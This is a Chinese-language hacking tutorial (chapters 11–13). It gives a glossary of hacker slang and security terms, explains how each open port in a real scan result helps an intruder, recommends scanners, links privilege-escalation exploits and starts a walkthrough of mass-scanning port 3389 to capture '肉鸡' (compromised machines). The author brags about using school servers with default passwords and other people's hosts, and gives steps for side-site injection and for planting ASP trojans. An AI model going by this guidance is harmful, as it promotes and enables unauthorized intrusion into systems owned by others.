Mail等)无缝连接,提供生动的图形用户界面。我们访问的www.sina.com.cn、www.163.com等站点都属于WWW的服务形式。 ◎ 网站 是一种通过互联网相互连接起来的,为用户提供网页服务(Web Server)、数据传输服务(FTP Server)、邮件服务(Mail Server)、数据库服务(Database Server)等多种服务的信息载体。它通常以虚拟主机或主机托管的方式进行存放和运作。网站一般拥有固定的域名,如:www.yahoo.com、www.163.net、 ◎ 网管 网络管理员的通常称为“网管”,是管理计算机网络操作的人。网管的职责包括安装新工作站和设备、维护授权用户列表、保管文件、监督口令保护和其他安全措施,管理共享资源的使用以及处理故障设备。 ◎ 网络协议 网络协议即网络中(包括互联网)传递、管理信息的一些规范。如同人与人之间相互交流是需要遵循一定的规矩一样,计算机之间的相互通信需要共同遵守一定的规则,这些规则就称为网络协议。 一台计算机只有在遵守网络协议的前提下,才能在网络上与其他计算机进行正常的通信。网络协议通常被分为几个层次,每层完成自己单独的功能。通信双方只有在共同的层次间才能相互联系。常见的协议有:TCP/IP协议、IPX/SPX协议、NetBIOS协议等等。在互联网上被广泛采用的是TCP/IP协议,在局域网中用得的比较多的是IPX/SPX.。用户如果访问Internet,则必须在网络协议中添加TCP/IP协议。 ◎ 网民 拥有固定的帐号或长期使用Internet的人一般称之为“网民”。是通过Internet或其他网络参加在线通信的人,尤其是会议和聊天服务,例如 Internet 新闻或具有Internet电子邮件访问能力的BBS网络—— Fido 网。 ◎ 虚拟主机 虚拟主机是使用特殊的软硬件技术,把一台运行在因特网上的服务器主机分成一台台“虚拟”的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、Email等)功能。一般来说企业要在网上用自己的独立域名建立网站,必须投资一台价格不菲的服务器,而且要架设专线、专人维护。虚拟主机则是利用电信局的主机为企业开设一个网站,该网站在外界看起来就如同企业自己建立的一样,拥有高速的网络出口。通常公司建立主页都采用这种方式。 ◎ 域名 互联网上的站点就象我们生活中的机构或家庭一样要有个地址,网民才能根据这个地址进行访问。其计算机的身份标识是32比特的二进制代码,也就是所谓的IP地址。为了便于记忆,按照一定的规则给Internet上的计算机起的名字就叫做域名。例如中央电视台的域名为:www.cctv.com。按照Internet的组织模式,对域名进行分级,一级域名主要有以下几种:.com(商业组织)、.net(网络中心)、.edu(教育机构)、.gov(政府部门)、.mil(军事机构)、.org(国际组织)等。大部分国家和地区都拥有自己独立的域名,例如:cn(中国)、us(美国)、uk(英国)、hk(香港)等等。二级域名如:supercool.163.net。 ◎ 一线通ISDN ISDN 是Intergrated Services Digital Network的缩写,即综合业务数字网。俗称“一线通”,顾名思义,ISDN将电话语音和电脑多媒体数据集成到一条高速的数字传输网络线路中,仅通过一条“线路”就可以为客户同时提供语音服务和数据服务。目前可连接8台终端或电话,有2台终端(例如:一部电话、一台计算机或一台数据终端)可以同时使用。具有以下特点: 1、一线多能——利用一对用户线可实现电话、传真、可视图文、数据通信等多种业务的通信。 2、高速上网——在一根普通电话线上,可以提供以64Kbps速率为基础并可达到128Kbps的上网速度的数字连接。 ◎ 主机托管 主机托管是把个人或公司的主机放在主机托管提供商(如:电信局)的Internet网络上,起着Internet网络上一台服务器的作用。此主机完全归客户或公司使用和控制。主机托管提供商要收取一定的托管费用。 ◎ 在线 在线(Online)也称联机,和脱机相对。一般有三种含义: 1、当前与网络连通; 2、能得到网络的请求服务; 3、聊天室里某人正在参加讨论。 ◎ 支付网关 支付网关(Payment Gateway)是连接银行专用网络与Internet的一组服务器,其主要作用是完成两者之间的通信、协议转换和进行数据加、解密,以保护银行内部网络的安全。 支付网关的功能主要有:将Internet传来的数据包解密,并按照银行系统内部的通信协议将数据重新打包;接收银行系统内部反馈的响应消息,将数据转换为Internet传送的数据格式,并对其进行加密。 第11章 黑客术语 什么是黑客[hacker] 黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。 另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。 黑客的起源 一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。 什么是菜鸟 "菜鸟"是一种谦虚的说法,比喻自己的水平很差.就像一只什么都不会的小鸟一样. 什么是肉鸡 所谓"肉鸡"其实就是一种很形象的比喻,比喻那些可以随意被我们控制的电脑. 什么是木马 特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。 什么是网页木马[网马] 网页木马就是利用你系统或软件的漏洞,在你浏览网页时下载一个木马程序,再利用该木马来控制你的电脑,盗取你的有用资料! 什么是挂马 就是在别人的网站文件里放入网页木马或是将恶意代码嵌入到对方正常网页文件里,以使浏览者中马 什么是后门 这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机,可以在对方的系统中植入特定的程序,这些改动表面是很难发现的,但是入侵这可以通过专门的工具轻易与这太电脑连接,重新控制该太电脑. 什么是rootkit Rootkit基本是由几个独立程序组成,一个典型rootkit包括:以太网嗅探器程程序,用于获得网络上传输的用户名和密码等信息。特洛伊木马程序,为攻击者提供后门。隐藏攻击者目录和进程的程序。还包括一些日志清理工具,攻击者用其删除wtmp、utmp和lastlog等日志文件中有关自己行踪的条目。复杂的rootkit还可以向攻击者提供telnet、shell和finger等服务。还包括一些用来清理/var/log和/var/adm目录中其它文件的脚本。 什么是远程控制 使用本台电脑通过网络控制另一台电脑,可以在远程电脑上实现本地的大部分操作,这就是远程控制. IPC$是什么 IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ ……) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。 什么是弱口令 弱口令是指口令[密码]强度不够,容易被猜解 什么是默认共享 默认共享:Windows 2000/XP/2003版本的操作系统提供了默认共享功能,这些默认的共享都有“$”标志,意为隐含的,包括所有的逻辑盘(C$,D$,E$……)和系统目录Winnt或Windows[admin$] 什么是shell 操作系统与外部最主要的接口就叫做shell。shell是操作系统最外面的一层。shell管理你与操作系统之间的交互:等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果。 什么是webshell 顾名思义,"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。 webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现,也有人称之为网站后门工具。 什么是溢出 更确切的说应该是"缓冲区溢出".简单的解释就是程序对接受的输入数据没有进行有效的检测而导致错误,后果可能造成程序崩溃或者是执行攻击者的命令. 什么是注入[注入点] 注入就是程序员在写代码是,对字符过滤不充分,导致一些不怀好意的人提交一些非常的字符之后,可以看到一些敏感信息,比如数据库地址之类的。 注入点就是可以进行注入的网址 例如 http://www.xxx.com/soft.asp?id=123 注入点都是连接数据库的 因此如果发先了注入点如果他的权限等设置的不好的话可以把服务器拿下! 工具可以用domain,啊d注入工具 什么是旁注 1.利用工具或者网站WHOIS你所要攻击的目标资料,得到关于网站的域名注册信息以及主机是否是虚拟主机的确定,因为这样子才可以从旁注入。 2.看服务器上面的所有网站程序,要理解熟悉每个程序的编写以及程序的功能(可以整天去源码站看源码,这样子你就会懂得如何去分别程序了) 3.利用现在所流行的所有漏洞来得到webshell 4.查看主机所开放的系统服务(这个办法是为了得到我们所要得到目标网站的路径)例如:Serv-u的用户配置文件(不是用来提升权限)IIS的用户配置文件(会泄漏大量用户路径的)杀毒软件的LOG(这个可是可遇不可求的) 5.在尽量不接触网站服务器的Admin权限下入侵(为了避免造成不必要的麻烦)) 6.建议使用两只以上的ASP木马 什么是提权[提升权限] 现在的操作系统为了安全,都引入了权限这个概念,那么到底权限是什么呢?其实就如同论坛权限一样,普通的会员是不能浏览VIP会员版的.而且普通会员跟不允许更改这个设置,只有管理员可以,所以管理员就是最高权限,这就是所谓的权限.那么如果论坛安全出了问题,普通会员通过其他方法更改了此限制,能够非法浏览VIP会员版,这就是提权. 问:什么是网络安全? 答:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭到破坏、更改、泄露,系统可以连续可靠正常地运行,网络服务不被中断。 问:什么是计算机病毒? 答:计算机病毒(Computer Virus)是指编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 问:什么是木马? 答:木马是一种带有恶意性质的远程控制软件。木马一般分为客户端(client)和服务器端(server)。客户端就是本地使用的各种命令的控制台,服务器端则是要给别人运行,只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。 问:什么是防火墙?它是如何确保网络安全的? 答:使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。 问:什么是后门?为什么会存在后门? 答:后门(Back Door)是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除,那么它就成了安全隐患。 问:什么叫入侵检测?﹖ 答:入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象 问:什么叫数据包监测?它有什么作用? 答:数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听”网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就允许某人截获数据并且查看它。 问:什么是NIDS? 答:NIDS是Network Intrusion Detection System的缩写,即网络入侵检测系统,主要用于检测Hacker或Cracker通过网络进行的入侵行为。NIDS的运行方式有两种,一种是在目标主机上运行以监测其本身的通信信息,另一种是在一台单独的机器上运行以监测所有网络设备的通信信息,比如Hub、路由器。 问:什么叫SYN包? 答:TCP连接的第一个包,非常小的一种数据包。SYN攻击包括大量此类的包,由于这些包看上去来自实际不存在的站点,因此无法有效进行处理。 问:加密技术是指什么? 答:加密技术是最常用的安全保密手段,利用技术手段把重要的数据变为乱码(加密)传送,到达目的地后再用相同或不同的手段还原(解密)。 加密技术包括两个元素:算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字(密钥)结合,产生不可理解的密文的步骤,密钥是用来对数据进行编码和解密的一种算法。在安全保密中,可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。 问:什么叫蠕虫病毒? 答:蠕虫病毒(Worm)源自第一种在网络上传播的病毒。1988年,22岁的康奈尔大学研究生罗伯特•莫里斯(Robert Morris)通过网络发送了一种专为攻击UNIX系统缺陷、名为“蠕虫”(Worm)的病毒。蠕虫造成了6000个系统瘫痪,估计损失为200万到6000万美元。由于这只蠕虫的诞生,在网上还专门成立了计算机应急小组(CERT)。现在蠕虫病毒家族已经壮大到成千上万种,并且这千万种蠕虫病毒大都出自黑客之手。 问:什么是操作系统型病毒?它有什么危害? 答:这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作,具有很强的破坏力,会导致整个系统瘫痪。而且由于感染了操作系统,这种病毒在运行时,会用自己的程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程序模块在操作系统中运行的地位与作用,以及病毒取代操作系统的取代方式等,对操作系统进行破坏。同时,这种病毒对系统中文件的感染性也很强。 问:莫里斯蠕虫是指什么?它有什么特点? 答:它的编写者是美国康乃尔大学一年级研究生罗特•莫里斯。这个程序只有99行,利用了Unix系统中的缺点,用Finger命令查联机用户名单,然后破译用户口令,用Mail系统复制、传播本身的源程序,再编译生成代码。 最初的网络蠕虫设计目的是当网络空闲时,程序就在计算机间“游荡”而不带来任何损害。当有机器负荷过重时,该程序可以从空闲计算机“借取资源”而达到网络的负载平衡。而莫里斯蠕虫不是“借取资源”,而是“耗尽所有资源”。 问:什么是DDoS?它会导致什么后果? 答:DDoS也就是分布式拒绝服务攻击。它使用与普通的拒绝服务攻击同样的方法,但是发起攻击的源是多个。通常攻击者使用下载的工具渗透无保护的主机,当获得该主机的适当的访问权限后,攻击者在主机中安装软件的服务或进程(以下简称代理)。这些代理保持睡眠状态,直到从它们的主控端得到指令,对指定的目标发起拒绝服务攻击。随着危害力极强的黑客工具的广泛传播使用,分布式拒绝服务攻击可以同时对一个目标发起几千个攻击。单个的拒绝服务攻击的威力也许对带宽较宽的站点没有影响,而分布于全球的几千个攻击将会产生致命的后果。 问:局域网内部的ARP攻击是指什么? 答:ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。 基于ARP协议的这一工作特性,黑客向对方计算机不断发送有欺诈性质的ARP数据包,数据包内包含有与当前设备重复的Mac地址,使对方在回应报文时,由于简单的地址重复错误而导致不能进行正常的网络通信。一般情况下,受到ARP攻击的计算机会出现两种现象: 1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。 2.计算机不能正常上网,出现网络中断的症状。 因为这种攻击是利用ARP请求报文进行“欺骗”的,所以防火墙会误以为是正常的请求数据包,不予拦截。因此普通的防火墙很难抵挡这种攻击。 问:什么叫欺骗攻击?它有哪些攻击方式? 答:网络欺骗的技术主要有:HONEYPOT和分布式HONEYPOT、欺骗空间技术等。主要方式有:IP欺骗、ARP欺骗、DNS欺骗、Web欺骗、电子邮件欺骗、源路由欺骗(通过指定路由,以假冒身份与其他主机进行合法通信或发送假报文,使受攻击主机出现错误动作)、地址欺骗(包括伪造源地址和伪造中间站点)等。 第12章 从端口说起 有些端口是比较重要的比如135,137,138,139,445之类,那我扫描到的端口到底有什么用?我想你肯定要问,这样今天,我就用一个真实的扫描向你讲述扫到的端口的用途。 被扫的主机:192.***.xx.x 主机IP数:4 发现的安全漏洞:7个 安全弱点:45个 系统:Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS Telnet (23/tcp) ssh (22/tcp) ftp (21/tcp) (发现安全漏洞) netstat (15/tcp) daytime (13/tcp) systat (11/tcp) echo (7/tcp) time (37/tcp) smtp (25/tcp) www (80/tcp) (发现安全漏洞) finger (79/tcp) auth (113/tcp) sunrpc (111/tcp) pop-2 (109/tcp) linuxconf (98/tcp) imap2 (143/tcp) printer (515/tcp) shell (514/tcp) login (513/tcp) exec (512/tcp) unknown (693/tcp) unknown (698/tcp) unknown (727/tcp) swat (910/tcp) unknown (1025/tcp) unknown (1039/tcp) unknown (1038/tcp) unknown (1037/tcp) unknown (1035/tcp) unknown (1034/tcp) unknown (3001/tcp) unknown (6000/tcp) echo (7/udp) general/tcp daytime (13/udp) unknown (728/udp) (发现安全漏洞) unknown (2049/udp) unknown (681/udp) unknown (2049/tcp)(发现安全漏洞) 可用telnet登录的端口 (23/tcp) 这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机,这种不用密码的远程登录服务是危险的,如果可以匿名登录,任何人可以在服务器和客户端之间发送数据。 发现的可攻击弱点 (21/tcp) 我在那里发现了一个目录是可写的: /incoming ftp端口 (21/tcp) ftp服务TELNET服务一样,是可以匿名登录的,而且在有的机器上它还允许你执行远程命令,比如CWD ~XXXX,如果你能CWD ROOT成功,那你就可以获得最高权限了,不过这样的好事好像不多。另外,有时还能用它获得一个可用的帐号(guest),或得知主机在运行什么系统 13/tcP(daytime) 从这里可以得知服务器在全天候运行,这样就有助于一个入侵者有足够的时间获取该主机运行的系统,再加上udp也在全天候的运行,这样可以使入侵者通过UDP欺骗达到主机拒绝服务的目的 ECHO(7/tcp) 这个端口现在没什么用处,但它可能成为一个问题的来源,顺着它有可能找到其它端口以达到拒绝服务的目的。 (25/tcp)smtp端口 该端口开放邮件传输协议 回应可执行EXPN和VRFY命令 EXPN可以发现发送邮件的名称或者能找到一个完整的邮件接收人的名称。 VRFY命令可以用来检测一个帐号的合法性 我们可以试着发这样一个类型的邮件给它: user@hostname1@victim 我们会收到一个这样的邮件: user@hostname1 也许我们就能用它穿过防火墙 WWW(80/TCP)端口 它表明WWW服务在该端口运行 finger (79/tcp) 端口 finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等 auth (113/tcp) ident服务披露给入侵者的将是较敏感的信息,从它可以得知哪个帐号运行的是什么样的服务,这将有助于入侵者集中精力去获取最有用的帐号(也就是哪些人拥有ROOT权限) (98/tcp) LINUX在这个端口上运行 (513/tcp) RLOGIN在这个端口上运行 这种服务形同于TELNET,任何人可以在它的引导下在客户端和服务端之间传送数据。 exec (512/tcp) rexecd在该端口开放,该服务使一个破译者有机会从它那里扫描到另外一个IP,或者利用它穿过防火墙。 也许你还能发现很多端口,不同的端口会有不同的作用 我最喜欢开135端口的,我们学校的几个FTP和主机都开了135端口,还用默认密码(不知道是为什么,我想主要是管理员考虑我们找不到肉鸡了『都2004年了,肉鸡很难找的,因为各位大侠都用着呢』,所以特地给我们准备好了),把我高兴的几天都没睡好,可惜里面没什么东西。只能当空间用着了。不过我们学校的主机大都用的是UNIX的,不是瘟二钱的,所以也让人有点郁闷啊,UNIX有点复杂,我只得从0学,还有点难,我会在后面讲到的,现在我们主要是关注WIN2000操作系统的主机了,说到这不能不提一下WIN2K源代码的泄漏,兄弟我在第一时间拿到了这个泄漏的源代码,有230M,还真多,看了一个晚上,也不怎么了解,反正有的是时间,先贴一段,大家瞧瞧,有看懂的,就不用来这看这了,呵呵 贴在网络技术里了 至于软件方面我喜欢用流光(有些人或许不知道这是什么),是扫描器,很好用,是国产的,就是前面访问的小容做的,但他在里面设置了限制不许PING国内的主机,但好多大哥早就破掉了(感觉很幸福啊,不用自己破了),现在的最高版本好像是流光5.0吧,到GOOGLE 上搜一下就能找到N个,我就不说了(要提高动手能力嘛) 下面我来介绍几种常见的扫描器: 一。NSS(网络安全扫描器) NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查: ■Sendmail ■匿名FTP ■NFS出口 ■TFTP ■Hosts.equiv ■Xhost 注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。 利用NSS,用户可以增加更强大的功能,其中包括: ■AppleTalk扫描 ■Novell扫描 ■LAN管理员扫描 ■可扫描子网 简单地说,NSS执行的进程包括: ■取得指定域的列表或报告,该域原本不存在这类列表 ■用Ping命令确定指定主机是否是活性的 ■扫描目标主机的端口 ■报告指定地址的漏洞 尽管没有详尽讨论NSS,但我在这里要说明一些次要的问题: ■在对NSS进行解压缩后,不能立即运行NSS,需要对它进行一些修改,必须设置一些环境变量,以适应你的机器配置。主要变量包括: ■$TmpDir_NSS使用的临时目录 ■$YPX-ypx应用程序的目录 ■$PING_可执行的ping命令的目录 ■$XWININFO_xwininfo的目录 提示:如果你隐藏了Perl include目录(目录中有Perl include文件),并且在PATH环境变量中没有包含该目录,你需要加上这个目录;同时,用户应该注意NSS需要ftplib.pl库函数。NSS具有并行能力,可以在许多工作站之间进行分布式扫描。而且,它可以使进程分支。在资源有限的机器上运行NSS(或未经允许运行NSS)应该避免这种情况,在代码中有这方面的选项设置。 你可在下面地址找到NSS拷贝。http://www.giga.or.at/pub/hacker/unix 二。Strobe(超级优化TCP端口检测程序) strobe是一个TCP端口扫描器,它可以记录指定机器的所有开放端口。strobe运行速度快(其作者声称在适中的时间内,便可扫描整个一个国家的机器)。 strobe的主要特点是,它能快速识别指定机器上正在运行什么服务。strobe的主要不足是这类信息是很有限的,一次strobe攻击充其量可以提供给“入侵者”一个粗略的指南,告诉什么服务可以被攻击。但是,strobe用扩展的行命令选项弥补了这个不足。比如,在用大量指定端口扫描主机时,你可以禁止所有重复的端口描述。(仅打印首次端口定义)其他选项包括: ■定义起始和终止端口 ■定义在多长时间内接收不到端口或主机响应,便终止这次扫描。 ■定义使用的socket号码 ■定义strobe要捕捉的目标主机的文件 提示:在你获得strobe的同时,必然获得手册页面,这对于Solaris 2.3是一个明显的问题,为了防止发生问题,你必须禁止使用getpeername()。在行命令中加入-g 标志就可以实现这一目的。 同时,尽管strobe没有对远程主机进行广泛测试,但它留下的痕迹与早期的ISS一样明显,被strobe扫描过的主机会知道这一切(这非常象在/var/adm/messages文件中执行连接请求)。 三。SATAN(安全管理员的网络分析工具) SATAN是为UNIX设计的,它主要是用C和Perl语言编写的(为了用户界面的友好性,还用了一些HTML技术)。它能在许多类UNIX平台上运行,有些根本不需要移植,而在其他平台上也只是略作移植。 注意:在Linux上运行SATAN有一个特殊问题,应用于原系统的某些规则在Linus平台上会引起系统失效的致命缺陷;在tcp-scan模块中实现select()调用也会产生问题;最后要说的是,如果用户扫描一个完整子网,则会引进反向fping爆炸,也即套接字(socket)缓冲溢出。但是,有一个站点不但包含了用于Linux的、改进的SATAN二进制代码,还包含了diff文件,这些条款可以在ftp.lod.com 上发现,或者可以直接从Sun站点(sunsite.unc.edu)取得diff文件: /pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz SATAN用于扫描远程主机的许多已知的漏洞,其中包括,但并不限于下列这些漏洞: ■FTPD脆弱性和可写的FTP目录 ■NFS脆弱性 ■NIS脆弱性 ■RSH脆弱性 ■Sendmail ■X服务器脆弱性 你可在下面地址中获得SATAN的拷贝:http://www.fish.com 安装过程 SATAN的安装和其他应用程序一样,每个平台上的SATAN目录可能略有不同,但一般都是/satan-1.1.1。安装的第一步(在阅读了使用文档说明后)是运行Perl程序reconfig。这个程序搜索各种不同的组成成分,并定义目录路径。如果它不能找到或定义一个浏览器。则运行失败,那些把浏览器安装在非标准目录中(并且没有在PATH中进行设置)的用户将不得不手工进行设置。同样,那些没有用DNS(未在自己机器上运行DNS)的用户也必须在/satan-1.1.1/conf/satan.cf中进行下列设置:$dont_use_nslookuo=1;在解决了全部路径问题后,用户可以在分布式系统上运行安装程序(IRIX或SunOS),我建议要非常仔细地观察编译,以找出错误。 提示:SATAN比一般扫描器需要更多一些的资源,尤其是在内存和处理器功能方面要求更高一些。如果你在运行SATAN时速度很慢,可以尝试几种解决办法。最直接的办法就是扩大内存和提高处理器能力,但是,如果这种办法不行,我建议用下面两种方法:一是尽可能地删除其他进程;二是把你一次扫描主机的数量限制在100台以下。最后说明的一点是,对于没有强大的视频支持或内存资源有限的主机,SATAN有一个行命令接口,这一点很重要。 四。Jakal Jakal是一个秘密扫描器,也就是就,它可以扫描一个区域(在防火墙后面),而不留下任何痕迹。 秘密扫描器工作时会产生“半扫描”(half scans),它启动(但从不完成)与目标主机的SYN/ACK过程。从根本上讲,秘密扫描器绕过了防火墙,并且避开了端口扫描探测器,识别出在防火墙后面运行的是什么服务。(这里包括了像Courtney和GAbriel这样的精制扫描探测器) 在下面地址中可以找到由Half life,Jeff(PhiJi)Fay和Abdullah Marahie编写的Jakal拷贝:http://www.giga.or.at.pub/hacker/unix ⑸IdentTCPscan IdentTCPscan是一个更加专业化的扫描器,其中加入了识别指定TCP端口进程的所有者的功能,也就是说,它能测定该进程的UID。 五.CONNECT CONNECT是一个bin/sh程序,它的用途是扫描TFTP服务子网 六。FSPScan FSPScan用于扫描FSP服务顺。FSP代表文件服务协议,是非常类似于FTP的Internet协议。它提供匿名文件传输,并且据说具有网络过载保护功能(比如,FSP从来不分*)。FSP最知名的安全特性可能就是它记录所有到来用户的主机名,这被认为优于FTP,因为FTP仅要求用户的E-mail地址(而实际上根本没有进行记录)。FSP相当流行,现在为Windows 和OS/2开发了GUI客户程序 七。XSCAN XSCAN扫描具有X服务器弱点的子网(或主机)。乍一看,这似乎并不太重要,毕竟其他多数扫描器都能做同样的工作。然而,XSCAN包括了一个增加的功能:如果它找到了一个脆弱的目标,它会立即加入记录。 XSCAN的其他优点还包括:可以一次扫描多台主机。这些主机可以在行命令中作为变量键入(并且你可以通过混合匹配同时指定 上面的有些是英文界面的,不过好像不少都用汉化补丁,找找吧。 还要推荐一个特好的(我第一次见到她就喜欢上了)就是SSS,Shadow Security Scanner 下载:http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner 天天安全的SSS下载能即使更新 关于NAMP的使用大家看看这个帖子 http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1362&star=1#1362 有人提意见了,说讲的太慢了,可我无法想象你连扫描,端口之类还弄不清楚,怎么进一步发展呢,昨天讲了扫描,相信很多朋友已经PING 了很多主机了吧,千万别弄我的啊,我用的是人家的主机,他们很白的。找到了漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与xx作系统核心的一种交互方式和界面。还是不懂是吗?有篇关于SHELL的帖子大家去看一看 http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426 ,如果还不知道就算了,你知道有这个词就可以了。 怎么得到shell呢?这很关键,有很多方法:典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。说到冰河我不想说那么多没有篇文章很好大家看一下:http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19 得到shell后,不是所有权限都会开的,得到管理员权限当然是我们的梦想了。所以有时会有提升权限的问题。当然这也是利用了漏洞。 Win2K 提升权限漏洞 http://www.yesky.com/20010530/182273.shtml ; Microsoft SQL Server Webtasks权限提升漏洞 http://www.mhdn.net/se/2002-11-08/6386.html Linux kernel ptrace提升权限漏洞 http://www.softhouse.com.cn/docs/southpark2169.html IIS提升权限漏洞 http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm 当然这些漏洞大都有补丁可下了,如果管理员勤快的话就不好了,不过很多人都很马虎的,我认识个管理员是一个高校的,用的是win2000竟从不打补丁,理由是俺用的是D版的,打补丁恐怕会冲系统啊(有道理啊) 觉得讲shell还不透彻(有朋友发短信问我了),我查了一下资料: Shell是什么? 任何发明都具有供用户使用的界面。UNIX供用户使用的界面就是Shell(DOS的command熟悉吧,但UNIX的要强大的多)。Shell为用户提供了输入命令和参数并可得到命令执行结果的环境。形象点就是:dos中的command.com就是一种shell程序 今天就说到这,最后写个小知识:针对网吧的限制 对有些朋友或许有用哦 http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=769 第13章 从终端服务3389讲起 昨天我们讲到了提升权限的问题,好现在我们就来说一个简单的入侵,从3389找个肉鸡(没有肉鸡的话,对自己的技术提高是没好处的,不能老是看却不练啊,陈同学你说对吗?) 请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦。众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点,这对大家是很好的,我想看我这个东西的很多都是学生吧(声明我就个学生哦)。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在“所有端口从”那里都填3389,点击“开始”就可以开工了。 